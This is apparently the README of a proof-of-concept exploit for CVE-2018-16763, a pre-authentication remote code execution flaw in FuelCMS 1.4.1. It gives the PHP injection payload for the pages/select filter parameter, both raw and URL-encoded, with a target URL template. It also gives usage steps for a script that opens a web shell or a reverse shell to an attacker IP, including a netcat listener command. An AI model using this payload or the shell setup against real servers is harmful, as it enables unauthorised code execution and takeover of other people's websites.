FuelCMS 1.4.1 Command Injection/Remote Code Execution.# # CVE-2018-16763 FuelCMS - 1.4.1 - RCE PoC
FuelCMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.
# # Exploit
This works by exploiting the PHP **filter** parameter which allows you to use the ``system`` function to send arbitrary commands.
Then the payload is obfuscated:
``'+pi(print($a='system'))+$a('<YOUR COMMAND HERE>')+'``
So it looks something like this:
``http://<TARGET>/fuel/pages/select/?filter='+pi(print($a='system'))+$a('<YOUR COMMAND HERE>')+'``
And then url-encode all characters:
``http://<TARGET>/fuel/pages/select/?filter=%27%2Bpi%28print%28%24a%3D%27system%27%29%29%2B%24a%28%27%3CYOUR%20COMMAND%20HERE%3E%27%29%2B%27``
Thanks to <a href='https://github.com/om3rcitak'>Omer Citak</a> for finding this vulnerability.
# # Usage
You run the exploit using ``python3 cve-2018-16763.py``
And you can Enter **1** for **Web-Shell** or **2** for **Reverse-Shell**
# # Web-Shell
For the **Web-Shell** all you need is to Provide your **TARGET URL**:
<img width="708" height="233" alt="webshell" src="https://github.com/user-attachments/assets/c160a17b-4209-4f96-a1bb-059fa40c39b6" />
# # Reverse-Shell
Setup a listener ``nc -lvnp <PORT>``
Run the exploit and Provide the following:
1. TARGET URL
2. ATTACKER IP
3. LISTENER PORT
<img width="714" height="258" alt="image" src="https://github.com/user-attachments/assets/0ac97d77-8645-4690-9446-955d9d0e9450" />
shell gained.
<img width="480" height="287" alt="image" src="https://github.com/user-attachments/assets/e4e7f0b3-63e9-4103-a79c-db8942c58a97" />
[4.0K] /data/pocs/91e9e4f982251a01f54c8353ffa1ee59c5c6d205
├── [2.9K] cve-2018-16763.py
└── [1.6K] README.md
0 directories, 2 files